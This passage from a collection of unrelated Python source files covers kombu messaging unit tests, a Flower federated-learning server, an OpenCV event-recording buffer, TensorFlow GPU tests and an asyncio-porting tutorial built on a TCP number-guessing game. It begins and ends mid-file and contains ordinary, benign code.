tgchannel_participants_count_thread.start() #channel participants count
client_info_thread = threading.Thread(target=consume_msgs, args=([KafkaTopics.CLIENT_INFO.value]))
client_info_thread.start() #client info
viewcount_update_thread = threading.Thread(target=consume_msgs, args=([KafkaTopics.VIEWCOUNT_UPDATE.value]))
viewcount_update_thread.start() #post viewcount updates
if __name__ == '__main__':
main()
|
test_common.py
|
import pytest
import socket
from amqp import RecoverableConnectionError
from unittest.mock import Mock, patch
from case import ContextMock
from kombu import common
from kombu.common import (
Broadcast, maybe_declare,
send_reply, collect_replies,
declaration_cached, ignore_errors,
QoS, PREFETCH_COUNT_MAX, generate_oid
)
from t.mocks import MockPool
def test_generate_oid():
from uuid import NAMESPACE_OID
instance = Mock()
args = (1, 1001, 2001, id(instance))
ent = '%x-%x-%x-%x' % args
with patch('kombu.common.uuid3') as mock_uuid3, \
patch('kombu.common.uuid5') as mock_uuid5:
mock_uuid3.side_effect = ValueError
mock_uuid3.return_value = 'uuid3-6ba7b812-9dad-11d1-80b4'
mock_uuid5.return_value = 'uuid5-6ba7b812-9dad-11d1-80b4'
oid = generate_oid(1, 1001, 2001, instance)
mock_uuid5.assert_called_once_with(NAMESPACE_OID, ent)
assert oid == 'uuid5-6ba7b812-9dad-11d1-80b4'
def test_ignore_errors():
connection = Mock()
connection.channel_errors = (KeyError,)
connection.connection_errors = (KeyError,)
with ignore_errors(connection):
raise KeyError()
def raising():
raise KeyError()
ignore_errors(connection, raising)
connection.channel_errors = connection.connection_errors = ()
with pytest.raises(KeyError):
with ignore_errors(connection):
raise KeyError()
class test_declaration_cached:
def test_when_cached(self):
chan = Mock()
chan.connection.client.declared_entities = ['foo']
assert declaration_cached('foo', chan)
def test_when_not_cached(self):
chan = Mock()
chan.connection.client.declared_entities = ['bar']
assert not declaration_cached('foo', chan)
class test_Broadcast:
def test_arguments(self):
with patch('kombu.common.uuid',
return_value='test') as uuid_mock:
q = Broadcast(name='test_Broadcast')
uuid_mock.assert_called_with()
assert q.name == 'bcast.test'
assert q.alias == 'test_Broadcast'
assert q.auto_delete
assert q.exchange.name == 'test_Broadcast'
assert q.exchange.type == 'fanout'
q = Broadcast('test_Broadcast', 'explicit_queue_name')
assert q.name == 'explicit_queue_name'
assert q.exchange.name == 'test_Broadcast'
q2 = q(Mock())
assert q2.name == q.name
with patch('kombu.common.uuid',
return_value='test') as uuid_mock:
q = Broadcast('test_Broadcast',
'explicit_queue_name',
unique=True)
uuid_mock.assert_called_with()
assert q.name == 'explicit_queue_name.test'
q2 = q(Mock())
assert q2.name.split('.')[0] == q.name.split('.')[0]
class test_maybe_declare:
def _get_mock_channel(self):
# Given: A mock Channel with mock'd connection/client/entities
channel = Mock()
channel.connection.client.declared_entities = set()
return channel
def _get_mock_entity(self, is_bound=False, can_cache_declaration=True):
# Given: Unbound mock Entity (will bind to channel when bind is called)
entity = Mock()
entity.can_cache_declaration = can_cache_declaration
entity.is_bound = is_bound
def _bind_entity(channel):
entity.channel = channel
entity.is_bound = True
return entity
entity.bind = _bind_entity
return entity
def test_cacheable(self):
# Given: A mock Channel and mock entity
channel = self._get_mock_channel()
# Given: A mock Entity that is already bound
entity = self._get_mock_entity(
is_bound=True, can_cache_declaration=True)
entity.channel = channel
entity.auto_delete = False
assert entity.is_bound, "Expected entity is bound to begin this test."
# When: Calling maybe_declare default
maybe_declare(entity, channel)
# Then: It called declare on the entity queue and added it to list
assert entity.declare.call_count == 1
assert hash(entity) in channel.connection.client.declared_entities
# When: Calling maybe_declare default (again)
maybe_declare(entity, channel)
# Then: we did not call declare again because its already in our list
assert entity.declare.call_count == 1
# When: Entity channel connection has gone away
entity.channel.connection = None
# Then: maybe_declare must raise a RecoverableConnectionError
with pytest.raises(RecoverableConnectionError):
maybe_declare(entity)
def test_binds_entities(self):
# Given: A mock Channel and mock entity
channel = self._get_mock_channel()
# Given: A mock Entity that is not bound
entity = self._get_mock_entity()
assert not entity.is_bound, "Expected entity unbound to begin test."
# When: calling maybe_declare with default of no retry policy
maybe_declare(entity, channel)
# Then: the entity is now bound because it called to bind it
assert entity.is_bound is True, "Expected entity is now marked bound."
def test_binds_entities_when_retry_policy(self):
# Given: A mock Channel and mock entity
channel = self._get_mock_channel()
# Given: A mock Entity that is not bound
entity = self._get_mock_entity()
assert not entity.is_bound, "Expected entity unbound to begin test."
# Given: A retry policy
sample_retry_policy = {
'interval_start': 0,
'interval_max': 1,
'max_retries': 3,
'interval_step': 0.2,
'errback': lambda x: "Called test errback retry policy",
}
# When: calling maybe_declare with retry enabled
maybe_declare(entity, channel, retry=True, **sample_retry_policy)
# Then: the entity is now bound because it called to bind it
assert entity.is_bound is True, "Expected entity is now marked bound."
def test_with_retry(self):
# Given: A mock Channel and mock entity
channel = self._get_mock_channel()
# Given: A mock Entity that is already bound
entity = self._get_mock_entity(
is_bound=True, can_cache_declaration=True)
entity.channel = channel
assert entity.is_bound, "Expected entity is bound to begin this test."
# When calling maybe_declare with retry enabled (default policy)
maybe_declare(entity, channel, retry=True)
# Then: the connection client used ensure to ensure the retry policy
assert channel.connection.client.ensure.call_count
def test_with_retry_dropped_connection(self):
# Given: A mock Channel and mock entity
channel = self._get_mock_channel()
# Given: A mock Entity that is already bound
entity = self._get_mock_entity(
is_bound=True, can_cache_declaration=True)
entity.channel = channel
assert entity.is_bound, "Expected entity is bound to begin this test."
# When: Entity channel connection has gone away
entity.channel.connection = None
# When: calling maybe_declare with retry
# Then: the RecoverableConnectionError should be raised
with pytest.raises(RecoverableConnectionError):
maybe_declare(entity, channel, retry=True)
class test_replies:
def test_send_reply(self):
req = Mock()
req.content_type = 'application/json'
req.content_encoding = 'binary'
req.properties = {'reply_to': 'hello',
'correlation_id': 'world'}
channel = Mock()
exchange = Mock()
exchange.is_bound = True
exchange.channel = channel
producer = Mock()
producer.channel = channel
producer.channel.connection.client.declared_entities = set()
send_reply(exchange, req, {'hello': 'world'}, producer)
assert producer.publish.call_count
args = producer.publish.call_args
assert args[0][0] == {'hello': 'world'}
assert args[1] == {
'exchange': exchange,
'routing_key': 'hello',
'correlation_id': 'world',
'serializer': 'json',
'retry': False,
'retry_policy': None,
'content_encoding': 'binary',
}
@patch('kombu.common.itermessages')
def test_collect_replies_with_ack(self, itermessages):
conn, channel, queue = Mock(), Mock(), Mock()
body, message = Mock(), Mock()
itermessages.return_value = [(body, message)]
it = collect_replies(conn, channel, queue, no_ack=False)
m = next(it)
assert m is body
itermessages.assert_called_with(conn, channel, queue, no_ack=False)
message.ack.assert_called_with()
with pytest.raises(StopIteration):
next(it)
channel.after_reply_message_received.assert_called_with(queue.name)
@patch('kombu.common.itermessages')
def test_collect_replies_no_ack(self, itermessages):
conn, channel, queue = Mock(), Mock(), Mock()
body, message = Mock(), Mock()
itermessages.return_value = [(body, message)]
it = collect_replies(conn, channel, queue)
m = next(it)
assert m is body
itermessages.assert_called_with(conn, channel, queue, no_ack=True)
message.ack.assert_not_called()
@patch('kombu.common.itermessages')
def test_collect_replies_no_replies(self, itermessages):
conn, channel, queue = Mock(), Mock(), Mock()
itermessages.return_value = []
it = collect_replies(conn, channel, queue)
with pytest.raises(StopIteration):
next(it)
channel.after_reply_message_received.assert_not_called()
class test_insured:
@patch('kombu.common.logger')
def test_ensure_errback(self, logger):
common._ensure_errback('foo', 30)
logger.error.assert_called()
def test_revive_connection(self):
on_revive = Mock()
channel = Mock()
common.revive_connection(Mock(), channel, on_revive)
on_revive.assert_called_with(channel)
common.revive_connection(Mock(), channel, None)
def get_insured_mocks(self, insured_returns=('works', 'ignored')):
conn = ContextMock()
pool = MockPool(conn)
fun = Mock()
insured = conn.autoretry.return_value = Mock()
insured.return_value = insured_returns
return conn, pool, fun, insured
def test_insured(self):
conn, pool, fun, insured = self.get_insured_mocks()
ret = common.insured(pool, fun, (2, 2), {'foo': 'bar'})
assert ret == 'works'
conn.ensure_connection.assert_called_with(
errback=common._ensure_errback,
)
insured.assert_called()
i_args, i_kwargs = insured.call_args
assert i_args == (2, 2)
assert i_kwargs == {'foo': 'bar', 'connection': conn}
conn.autoretry.assert_called()
ar_args, ar_kwargs = conn.autoretry.call_args
assert ar_args == (fun, conn.default_channel)
assert ar_kwargs.get('on_revive')
assert ar_kwargs.get('errback')
def test_insured_custom_errback(self):
conn, pool, fun, insured = self.get_insured_mocks()
custom_errback = Mock()
common.insured(pool, fun, (2, 2), {'foo': 'bar'},
errback=custom_errback)
conn.ensure_connection.assert_called_with(errback=custom_errback)
class MockConsumer:
consumers = set()
def __init__(self, channel, queues=None, callbacks=None, **kwargs):
self.channel = channel
self.queues = queues
self.callbacks = callbacks
def __enter__(self):
self.consumers.add(self)
return self
def __exit__(self, *exc_info):
self.consumers.discard(self)
class test_itermessages:
class MockConnection:
should_raise_timeout = False
def drain_events(self, **kwargs):
if self.should_raise_timeout:
raise socket.timeout()
for consumer in MockConsumer.consumers:
for callback in consumer.callbacks:
callback('body', 'message')
def test_default(self):
conn = self.MockConnection()
channel = Mock()
channel.connection.client = conn
conn.Consumer = MockConsumer
it = common.itermessages(conn, channel, 'q', limit=1)
ret = next(it)
assert ret == ('body', 'message')
with pytest.raises(StopIteration):
next(it)
def test_when_raises_socket_timeout(self):
conn = self.MockConnection()
conn.should_raise_timeout = True
channel = Mock()
channel.connection.client = conn
conn.Consumer = MockConsumer
it = common.itermessages(conn, channel, 'q', limit=1)
with pytest.raises(StopIteration):
next(it)
@patch('kombu.common.deque')
def test_when_raises_IndexError(self, deque):
deque_instance = deque.return_value = Mock()
deque_instance.popleft.side_effect = IndexError()
conn = self.MockConnection()
channel = Mock()
conn.Consumer = MockConsumer
it = common.itermessages(conn, channel, 'q', limit=1)
with pytest.raises(StopIteration):
next(it)
class test_QoS:
class _QoS(QoS):
def __init__(self, value):
self.value = value
QoS.__init__(self, None, value)
def set(self, value):
return value
def test_qos_exceeds_16bit(self):
with patch('kombu.common.logger') as logger:
callback = Mock()
qos = QoS(callback, 10)
qos.prev = 100
# cannot use 2 ** 32 because of a bug on macOS Py2.5:
# https://jira.mongodb.org/browse/PYTHON-389
qos.set(4294967296)
logger.warning.assert_called()
callback.assert_called_with(prefetch_count=0)
def test_qos_increment_decrement(self):
qos = self._QoS(10)
assert qos.increment_eventually() == 11
assert qos.increment_eventually(3) == 14
assert qos.increment_eventually(-30) == 14
assert qos.decrement_eventually(7) == 7
assert qos.decrement_eventually() == 6
def test_qos_disabled_increment_decrement(self):
qos = self._QoS(0)
assert qos.increment_eventually() == 0
assert qos.increment_eventually(3) == 0
assert qos.increment_eventually(-30) == 0
assert qos.decrement_eventually(7) == 0
assert qos.decrement_eventually() == 0
assert qos.decrement_eventually(10) == 0
def test_qos_thread_safe(self):
qos = self._QoS(10)
def add():
for i in range(1000):
qos.increment_eventually()
def sub():
for i in range(1000):
qos.decrement_eventually()
def threaded(funs):
from threading import Thread
threads = [Thread(target=fun) for fun in funs]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
threaded([add, add])
assert qos.value == 2010
qos.value = 1000
threaded([add, sub]) # n = 2
assert qos.value == 1000
def test_exceeds_short(self):
qos = QoS(Mock(), PREFETCH_COUNT_MAX - 1)
qos.update()
assert qos.value == PREFETCH_COUNT_MAX - 1
qos.increment_eventually()
assert qos.value == PREFETCH_COUNT_MAX
qos.increment_eventually()
assert qos.value == PREFETCH_COUNT_MAX + 1
qos.decrement_eventually()
assert qos.value == PREFETCH_COUNT_MAX
qos.decrement_eventually()
assert qos.value == PREFETCH_COUNT_MAX - 1
def test_consumer_increment_decrement(self):
mconsumer = Mock()
qos = QoS(mconsumer.qos, 10)
qos.update()
assert qos.value == 10
mconsumer.qos.assert_called_with(prefetch_count=10)
qos.decrement_eventually()
qos.update()
assert qos.value == 9
mconsumer.qos.assert_called_with(prefetch_count=9)
qos.decrement_eventually()
assert qos.value == 8
mconsumer.qos.assert_called_with(prefetch_count=9)
assert {'prefetch_count': 9} in mconsumer.qos.call_args
# Does not decrement 0 value
qos.value = 0
qos.decrement_eventually()
assert qos.value == 0
qos.increment_eventually()
assert qos.value == 0
def test_consumer_decrement_eventually(self):
mconsumer = Mock()
qos = QoS(mconsumer.qos, 10)
qos.decrement_eventually()
assert qos.value == 9
qos.value = 0
qos.decrement_eventually()
assert qos.value == 0
def test_set(self):
mconsumer = Mock()
qos = QoS(mconsumer.qos, 10)
qos.set(12)
assert qos.prev == 12
qos.set(qos.prev)
|
server.py
|
import flwr as fl
import multiprocessing as mp
import argparse
from flower_helpers import Net, FedAvgDp, get_weights, test
"""
If you get an error like: “failed to connect to all addresses” “grpc_status”:14,
then uncomment the lines below:
"""
# import os
# if os.environ.get("https_proxy"):
# del os.environ["https_proxy"]
# if os.environ.get("http_proxy"):
# del os.environ["http_proxy"]
batch_size = None
def get_eval_fn():
"""Get the evaluation function for server side.
Returns
-------
evaluate
The evaluation function
"""
def evaluate(weights):
"""Evaluation function for server side.
Parameters
----------
weights
Updated model weights to evaluate.
Returns
-------
loss
Loss on the test set.
accuracy
Accuracy on the test set.
"""
global batch_size
# Prepare multiprocess
manager = mp.Manager()
# We receive the results through a shared dictionary
return_dict = manager.dict()
# Create the process
# 0 is the data share index and 1 is the total number of clients; for the
# server-side test we take the full test set
p = mp.Process(target=test, args=(weights, return_dict, 0, 1, batch_size))
# Start the process
p.start()
# Wait for it to end
p.join()
# Close it
try:
p.close()
except ValueError as e:
print(f"Couldn't close the evaluating process: {e}")
# Get the return values
loss = return_dict["loss"]
accuracy = return_dict["accuracy"]
# Del everything related to multiprocessing
del (manager, return_dict, p)
return float(loss), {"accuracy": float(accuracy)}
return evaluate
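# Generic sketch of the pattern used in evaluate() above (toy worker, not the real
# test()): run a function in a separate process and read the results back through a
# multiprocessing.Manager dict. Names prefixed with _demo are hypothetical.
def _demo_worker(shared):
    shared["loss"], shared["accuracy"] = 0.5, 0.9  # placeholder values

def _demo_mp_result():
    manager = mp.Manager()
    shared = manager.dict()
    proc = mp.Process(target=_demo_worker, args=(shared,))
    proc.start()
    proc.join()
    return dict(shared)  # e.g. {'loss': 0.5, 'accuracy': 0.9}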
def main():
# Start Flower server for three rounds of federated learning
parser = argparse.ArgumentParser()
parser.add_argument(
"-r", type=int, default=3, help="Number of rounds for the federated training"
)
parser.add_argument(
"-nbc",
type=int,
default=2,
help="Number of clients to keep track of dataset share",
)
parser.add_argument("-b", type=int, default=256, help="Batch size")
parser.add_argument(
"-fc",
type=int,
default=2,
help="Min fit clients, min number of clients to be sampled next round",
)
parser.add_argument(
"-ac",
type=int,
default=2,
help="Min available clients, min number of clients that need to connect to the server before training round can start",
)
args = parser.parse_args()
rounds = int(args.r)
fc = int(args.fc)
ac = int(args.ac)
global batch_size
batch_size = int(args.b)
# Set the start method for multiprocessing in case Python version is under 3.8.1
mp.set_start_method("spawn")
# Create a new fresh model to initialize parameters
net = Net()
init_weights = get_weights(net)
# Convert the weights (np.ndarray) to parameters
init_param = fl.common.weights_to_parameters(init_weights)
# del the net as we don't need it anymore
del net
# Define the strategy
strategy = FedAvgDp(
fraction_fit=float(fc / ac),
min_fit_clients=fc,
min_available_clients=ac,
eval_fn=get_eval_fn(),
initial_parameters=init_param,
)
fl.server.start_server(
"[::]:8080", config={"num_rounds": rounds}, strategy=strategy
)
if __name__ == "__main__":
main()
|
eventrecording.py
|
from collections import deque
from threading import Thread
from queue import Queue
import time
import cv2
class EventDetection:
def __init__(self, bufsize=64, timeout=1.0):
self.bufsize = bufsize
self.timeout = timeout
# create a buffer named frames and a queue for said buffer
self.frames = deque(maxlen=self.bufsize)
self.Q = None
# create a video writer, writer thread, and bool for recording
self.writer = None
self.thread = None
self.recording = False
def update(self, frame):
# add frame to frame buffer
self.frames.appendleft(frame)
# if we are recording then update the queue with the frame too
if self.recording:
self.Q.put(frame)
def start(self, outputPath, fourcc, fps):
self.recording = True
# start the video writer and initialize the queue of frames that need to be written to file
self.writer = cv2.VideoWriter(outputPath, fourcc, fps,
(self.frames[0].shape[1], self.frames[0].shape[0]), True)
self.Q = Queue()
# add frames from dequeue to the queue
for i in range(len(self.frames), 0, -1):
self.Q.put(self.frames[i-1])
# spawn a new thread to write frames to the video file
self.thread = Thread(target=self.write, args=())
self.thread.daemon = True
self.thread.start()
def write(self):
while True:
# if there is no recording going on exit the thread
if not self.recording:
return
# check to see if there are entries in the queue
if not self.Q.empty():
# grab the next frame from the queue and write to video file
frame = self.Q.get()
self.writer.write(frame)
else:
time.sleep(self.timeout)
def flush(self):
# empty the queue by flushing all remaining frames to file
while not self.Q.empty():
frame = self.Q.get()
self.writer.write(frame)
def finish(self):
# stop recording, join the thread, flush all remaining frames in the queue to file,
# and release to writer pointer
self.recording = False
self.thread.join()
self.flush()
self.writer.release()
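# Hypothetical usage sketch with synthetic frames (numpy and the output path are
# assumptions, not part of the original module): buffer frames continuously, start
# writing when an "event" fires, then flush the queue and release the writer.
import numpy as np

def _event_recording_demo(path="event_demo.avi", fps=30):
    detector = EventDetection(bufsize=32)
    fourcc = cv2.VideoWriter_fourcc(*"MJPG")
    for i in range(100):
        frame = np.full((120, 160, 3), i % 255, dtype=np.uint8)  # synthetic frame
        detector.update(frame)
        if i == 50:                        # pretend an event was detected here
            detector.start(path, fourcc, fps)
    detector.finish()                      # join writer thread, flush queue, release file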
|
basic_gpu_test.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Functional tests for basic component wise operations using a GPU device."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import itertools
import threading
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gradient_checker
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import variables
from tensorflow.python.ops.gen_array_ops import _broadcast_gradient_args
from tensorflow.python.platform import test
class GPUBinaryOpsTest(test.TestCase):
def _compareGPU(self, x, y, np_func, tf_func):
with self.test_session(use_gpu=True) as sess:
inx = ops.convert_to_tensor(x)
iny = ops.convert_to_tensor(y)
out = tf_func(inx, iny)
tf_gpu = sess.run(out)
with self.test_session(use_gpu=False) as sess:
inx = ops.convert_to_tensor(x)
iny = ops.convert_to_tensor(y)
out = tf_func(inx, iny)
tf_cpu = sess.run(out)
self.assertAllClose(tf_cpu, tf_gpu)
def testFloatBasic(self):
x = np.linspace(-5, 20, 15).reshape(1, 3, 5).astype(np.float32)
y = np.linspace(20, -5, 15).reshape(1, 3, 5).astype(np.float32)
self._compareGPU(x, y, np.add, math_ops.add)
self._compareGPU(x, y, np.subtract, math_ops.subtract)
self._compareGPU(x, y, np.multiply, math_ops.multiply)
self._compareGPU(x, y + 0.1, np.true_divide, math_ops.truediv)
self._compareGPU(x, y + 0.1, np.floor_divide, math_ops.floordiv)
self._compareGPU(x, y, np.power, math_ops.pow)
def testFloatWithBCast(self):
x = np.linspace(-5, 20, 15).reshape(3, 5).astype(np.float32)
y = np.linspace(20, -5, 30).reshape(2, 3, 5).astype(np.float32)
self._compareGPU(x, y, np.add, math_ops.add)
self._compareGPU(x, y, np.subtract, math_ops.subtract)
self._compareGPU(x, y, np.multiply, math_ops.multiply)
self._compareGPU(x, y + 0.1, np.true_divide, math_ops.truediv)
def testDoubleBasic(self):
x = np.linspace(-5, 20, 15).reshape(1, 3, 5).astype(np.float64)
y = np.linspace(20, -5, 15).reshape(1, 3, 5).astype(np.float64)
self._compareGPU(x, y, np.add, math_ops.add)
self._compareGPU(x, y, np.subtract, math_ops.subtract)
self._compareGPU(x, y, np.multiply, math_ops.multiply)
self._compareGPU(x, y + 0.1, np.true_divide, math_ops.truediv)
def testDoubleWithBCast(self):
x = np.linspace(-5, 20, 15).reshape(3, 5).astype(np.float64)
y = np.linspace(20, -5, 30).reshape(2, 3, 5).astype(np.float64)
self._compareGPU(x, y, np.add, math_ops.add)
self._compareGPU(x, y, np.subtract, math_ops.subtract)
self._compareGPU(x, y, np.multiply, math_ops.multiply)
self._compareGPU(x, y + 0.1, np.true_divide, math_ops.truediv)
class MathBuiltinUnaryTest(test.TestCase):
def _compare(self, x, np_func, tf_func, use_gpu):
np_out = np_func(x)
with self.test_session(use_gpu=use_gpu) as sess:
inx = ops.convert_to_tensor(x)
ofunc = tf_func(inx)
tf_out = sess.run(ofunc)
self.assertAllClose(np_out, tf_out)
def _inv(self, x):
return 1.0 / x
def _rsqrt(self, x):
return self._inv(np.sqrt(x))
def _testDtype(self, dtype, use_gpu):
data = (np.arange(-3, 3) / 4.).reshape([1, 3, 2]).astype(dtype)
self._compare(data, np.abs, math_ops.abs, use_gpu)
self._compare(data, np.arccos, math_ops.acos, use_gpu)
self._compare(data, np.arcsin, math_ops.asin, use_gpu)
self._compare(data, np.arctan, math_ops.atan, use_gpu)
self._compare(data, np.ceil, math_ops.ceil, use_gpu)
self._compare(data, np.cos, math_ops.cos, use_gpu)
self._compare(data, np.exp, math_ops.exp, use_gpu)
self._compare(data, np.floor, math_ops.floor, use_gpu)
self._compare(data, np.log, math_ops.log, use_gpu)
self._compare(data, np.log1p, math_ops.log1p, use_gpu)
self._compare(data, np.negative, math_ops.negative, use_gpu)
self._compare(data, self._rsqrt, math_ops.rsqrt, use_gpu)
self._compare(data, np.sin, math_ops.sin, use_gpu)
self._compare(data, np.sqrt, math_ops.sqrt, use_gpu)
self._compare(data, np.square, math_ops.square, use_gpu)
self._compare(data, np.tan, math_ops.tan, use_gpu)
self._compare(data, np.tanh, math_ops.tanh, use_gpu)
def testTypes(self):
for dtype in [np.float32]:
self._testDtype(dtype, use_gpu=True)
def testFloorDevide(self):
x = (1 + np.linspace(0, 5, np.prod([1, 3, 2]))).astype(np.float32).reshape(
[1, 3, 2])
y = (1 + np.linspace(0, 5, np.prod([1, 3, 2]))).astype(np.float32).reshape(
[1, 3, 2])
np_out = np.floor_divide(x, y + 0.1)
with self.test_session(use_gpu=True) as sess:
inx = ops.convert_to_tensor(x)
iny = ops.convert_to_tensor(y + 0.1)
ofunc = inx / iny
out_func2 = math_ops.floor(ofunc)
tf_out = sess.run(out_func2)
self.assertAllClose(np_out, tf_out)
class BroadcastSimpleTest(test.TestCase):
def _GetGradientArgs(self, xs, ys):
with self.test_session(use_gpu=True) as sess:
return sess.run(_broadcast_gradient_args(xs, ys))
def testBroadcast(self):
r0, r1 = self._GetGradientArgs([2, 3, 5], [1])
self.assertAllEqual(r0, [])
self.assertAllEqual(r1, [0, 1, 2])
_GRAD_TOL = {dtypes.float32: 1e-3}
def _compareGradientX(self,
x,
y,
np_func,
tf_func,
numeric_gradient_type=None):
z = np_func(x, y)
zs = list(z.shape)
with self.test_session():
inx = ops.convert_to_tensor(x)
iny = ops.convert_to_tensor(y)
if x.dtype in (np.float32, np.float64):
out = 1.1 * tf_func(inx, iny)
else:
out = tf_func(inx, iny)
xs = list(x.shape)
jacob_t, jacob_n = gradient_checker.compute_gradient(
inx, xs, out, zs, x_init_value=x)
tol = self._GRAD_TOL[dtypes.as_dtype(x.dtype)]
self.assertAllClose(jacob_t, jacob_n, rtol=tol, atol=tol)
def _compareGradientY(self,
x,
y,
np_func,
tf_func,
numeric_gradient_type=None):
z = np_func(x, y)
zs = list(z.shape)
with self.test_session():
inx = ops.convert_to_tensor(x)
iny = ops.convert_to_tensor(y)
if x.dtype in (np.float32, np.float64):
out = 1.1 * tf_func(inx, iny)
else:
out = tf_func(inx, iny)
ys = list(np.shape(y))
jacob_t, jacob_n = gradient_checker.compute_gradient(
iny, ys, out, zs, x_init_value=y)
tol = self._GRAD_TOL[dtypes.as_dtype(x.dtype)]
self.assertAllClose(jacob_t, jacob_n, rtol=tol, atol=tol)
def _compareGpu(self, x, y, np_func, tf_func):
np_ans = np_func(x, y)
with self.test_session(use_gpu=True):
inx = ops.convert_to_tensor(x)
iny = ops.convert_to_tensor(y)
out = tf_func(inx, iny)
tf_gpu = out.eval()
self.assertAllClose(np_ans, tf_gpu)
self.assertShapeEqual(np_ans, out)
# TODO(zhifengc/ke): make gradient checker work on GPU.
def testGradient(self):
x = (1 + np.linspace(0, 5, np.prod([1, 3, 2]))).astype(np.float32).reshape(
[1, 3, 2])
y = (1 + np.linspace(0, 5, np.prod([1, 3, 2]))).astype(np.float32).reshape(
[1, 3, 2])
self._compareGradientX(x, y, np.true_divide, math_ops.truediv)
self._compareGradientY(x, y, np.true_divide, math_ops.truediv)
self._compareGpu(x, y, np.true_divide, math_ops.truediv)
self._compareGpu(x, y + 0.1, np.floor_divide, math_ops.floordiv)
class GpuMultiSessionMemoryTest(test_util.TensorFlowTestCase):
"""Tests concurrent sessions executing on the same GPU."""
def _run_session(self, session, results):
n_iterations = 500
with session as s:
data = variables.Variable(1.0)
with ops.device('/gpu:0'):
random_seed.set_random_seed(1)
matrix1 = variables.Variable(
random_ops.truncated_normal([1024, 1]), name='matrix1')
matrix2 = variables.Variable(
random_ops.truncated_normal([1, 1024]), name='matrix2')
x1 = math_ops.multiply(data, matrix1, name='x1')
x3 = math_ops.matmul(x1, math_ops.matmul(matrix2, matrix1))
x4 = math_ops.matmul(array_ops.transpose(x3), x3, name='x4')
s.run(variables.global_variables_initializer())
for _ in xrange(n_iterations):
value = s.run(x4)
results.add(value.flat[0])
if len(results) != 1:
break
def testConcurrentSessions(self):
n_threads = 4
threads = []
results = []
for _ in xrange(n_threads):
session = self.test_session(graph=ops.Graph(), use_gpu=True)
results.append(set())
args = (session, results[-1])
threads.append(threading.Thread(target=self._run_session, args=args))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
flat_results = set([x for x in itertools.chain(*results)])
self.assertEqual(1,
len(flat_results),
'Expected single value, got %r' % flat_results)
if __name__ == '__main__':
test.main()
|
Item61.py
|
"""
Item 61: Know How to Port Threaded I/O to asyncio
This item shows how to port code that does threaded, blocking I/O over to coroutines and asynchronous I/O.
Slatkin implements a TCP-based server (Transmission Control Protocol, see https://en.wikipedia.org/wiki/Transmission_Control_Protocol)
for guessing a number. This kind of client/server is typically built using blocking I/O and threads.
Python provides asynchronous versions of for loops, with statements, generators, comprehensions, and library
helper functions. Asynchronous equivalents of next and iter are not currently provided.
The asyncio built-in module makes it easy to port existing code that uses threads and blocking I/O over to coroutines
and asynchronous I/O.
See https://docs.python.org/3/library/asyncio.html for more information.
"""
#!/usr/bin/env PYTHONHASHSEED=1234 python3
# Reproduce book environment
import random
random.seed(1234)
import logging
from pprint import pprint
from sys import stdout as STDOUT
# Write all output to a temporary directory
import atexit
import gc
import io
import os
import tempfile
TEST_DIR = tempfile.TemporaryDirectory()
atexit.register(TEST_DIR.cleanup)
# Make sure Windows processes exit cleanly
OLD_CWD = os.getcwd()
atexit.register(lambda: os.chdir(OLD_CWD))
os.chdir(TEST_DIR.name)
def close_open_files():
everything = gc.get_objects()
for obj in everything:
if isinstance(obj, io.IOBase):
obj.close()
atexit.register(close_open_files)
# Example 1: First we construct a helper class for managing sending and receiving messages.
class EOFError(Exception):
pass
class ConnectionBase:
def __init__(self, connection):
self.connection = connection
self.file = connection.makefile('rb')
def send(self, command):
line = command + '\n'
data = line.encode()
self.connection.send(data)
def receive(self):
line = self.file.readline()
if not line:
raise EOFError('Connection closed')
return line[:-1].decode()
# Example 2: We implement the server. Handles one connection at a time and maintains the client's
# session state.
import random
WARMER = 'Warmer'
COLDER = 'Colder'
UNSURE = 'Unsure'
CORRECT = 'Correct'
class UnknownCommandError(Exception):
pass
class Session(ConnectionBase):
def __init__(self, *args):
# See Item 40 - super() solves the problem of superclass initialization and diamond inheritance.
# See also: https://en.wikipedia.org/wiki/Multiple_inheritance
super().__init__(*args)
self._clear_state(None, None)
def _clear_state(self, lower, upper):
self.lower = lower
self.upper = upper
self.secret = None
self.guesses = []
# Example 3: Handles incoming commands and chooses the appropriate method
def loop(self):
while command := self.receive():
parts = command.split(' ')
if parts[0] == 'PARAMS':
self.set_params(parts)
elif parts[0] == 'NUMBER':
self.send_number()
elif parts[0] == 'REPORT':
self.receive_report(parts)
else:
raise UnknownCommandError(command)
# Example 4: Sets upper and lower boundaries for the guess.
def set_params(self, parts):
assert len(parts) == 3
lower = int(parts[1])
upper = int(parts[2])
self._clear_state(lower, upper)
# Example 5: Makes a new guess, making sure the same number is not chosen twice.
def next_guess(self):
if self.secret is not None:
return self.secret
while True:
guess = random.randint(self.lower, self.upper)
if guess not in self.guesses:
return guess
def send_number(self):
guess = self.next_guess()
self.guesses.append(guess)
self.send(format(guess))
# Example 6: Receives the client's report on the last guess and records it when correct.
def receive_report(self, parts):
assert len(parts) == 2
decision = parts[1]
last = self.guesses[-1]
if decision == CORRECT:
self.secret = last
print(f'Server: {last} is {decision}')
# Example 7: Implement the client using a stateful class
import contextlib
import math
class Client(ConnectionBase):
def __init__(self, *args):
super().__init__(*args)
self._clear_state()
def _clear_state(self):
self.secret = None
self.last_distance = None
# Example 8: Sends first commands to server
@contextlib.contextmanager
def session(self, lower, upper, secret):
print(f'Guess a number between {lower} and {upper}!'
f' Shhhhh, it\'s {secret}.')
self.secret = secret
self.send(f'PARAMS {lower} {upper}')
try:
yield
finally:
self._clear_state()
self.send('PARAMS 0 -1')
# Example 9: New guesses are requested from the server.
def request_numbers(self, count):
for _ in range(count):
self.send('NUMBER')
data = self.receive()
yield int(data)
if self.last_distance == 0:
return
